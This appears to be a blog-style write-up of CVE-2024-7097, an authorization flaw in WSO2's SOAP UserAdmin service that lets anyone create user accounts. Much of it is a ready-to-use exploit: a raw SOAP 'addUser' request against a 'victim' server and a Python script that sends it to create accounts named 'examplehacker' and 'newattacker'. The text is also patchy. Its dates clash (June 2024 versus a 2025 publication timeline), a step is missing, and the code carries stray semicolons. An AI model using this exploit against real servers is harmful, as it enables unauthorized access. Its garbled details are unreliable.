In June 2024, a major security flaw was uncovered in various WSO2 products—technology used for identity access management and APIs worldwide. This vulnerability, tracked as CVE-2024-7097, stems from a critical authorization mistake in the platform’s administrative SOAP service. Let’s break down how this issue came about, what it allows, and exactly how attackers could exploit it.
What is CVE-2024-7097?
CVE-2024-7097 is an “incorrect authorization” vulnerability affecting several WSO2 products, such as WSO2 Identity Server, API Manager, and Enterprise Integrator.
The Core Problem
Normally, organizations can configure user self-registration—so users can or cannot create their own accounts. However, due to a logic flaw, the SOAP admin web service responsible for user management ignores this setting altogether. That means anyone who can send a SOAP request to the service can create new accounts, even if self-registration should NOT be allowed.
Prerequisites
- Attacker needs network access to the target WSO2 system’s SOAP API (often at /services/ endpoint).
Account Created
The platform creates the new user account, which can now be used to log in with whatever default privileges are granted.
Here is an example request you might send (replace variables with real values)
POST /services/UserAdmin?wsdl HTTP/1.1
Host: victim-wso2-server.local
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:addUser"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/";
xmlns:ser="http://service.user.admin.carbon.wso2.org">;
<soapenv:Header/>
<soapenv:Body>
<ser:addUser>
<userName>examplehacker</userName>
<password>VerySecret123!</password>
<roles>everyone</roles>
<profileName>default</profileName>
</ser:addUser>
</soapenv:Body>
</soapenv:Envelope>
Despite self-registration typically being DISABLED, the user examplehacker now exists in the system!
Below is a basic Python demo using requests
import requests
target = "http://victim-wso2-server.local/services/UserAdmin";
headers = {
"Content-Type": "text/xml; charset=utf-8",
"SOAPAction": "urn:addUser"
}
body = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/";
xmlns:ser="http://service.user.admin.carbon.wso2.org">;
<soapenv:Header/>
<soapenv:Body>
<ser:addUser>
<userName>newattacker</userName>
<password>Sneaky!Pass123</password>
<roles>everyone</roles>
<profileName>default</profileName>
</ser:addUser>
</soapenv:Body>
</soapenv:Envelope>
'''
r = requests.post(target, headers=headers, data=body)
print(r.status_code, r.text if r.status_code != 200 else "User created (or already exists)")
Impact of the Vulnerability
- Unauthorized access: Even limited accounts could be enough for reconnaissance or attacking other features.
Privilege Escalation: If role-assignment is weak, attacker may chain this with other bugs.
- Denial of Service: Large numbers of accounts can fill user storage, crash the database, or overwhelm admins.
Mitigations
- Update Immediately: WSO2 Security Advisories detail patched versions.
References
- WSO2 Security Advisory: CVE-2024-7097
- NVD Entry for CVE-2024-7097
- WSO2 UserAdmin SOAP API Docs
Summary
CVE-2024-7097 is a critical logic bug in WSO2’s SOAP admin API that lets anyone with access create user accounts—even if self-registration is meant to be off. If you use affected WSO2 products, patch ASAP, limit access, and watch for suspicious sign-ups.
Timeline
Published on: 05/30/2025 15:15:40 UTC
Last modified on: 05/30/2025 17:15:28 UTC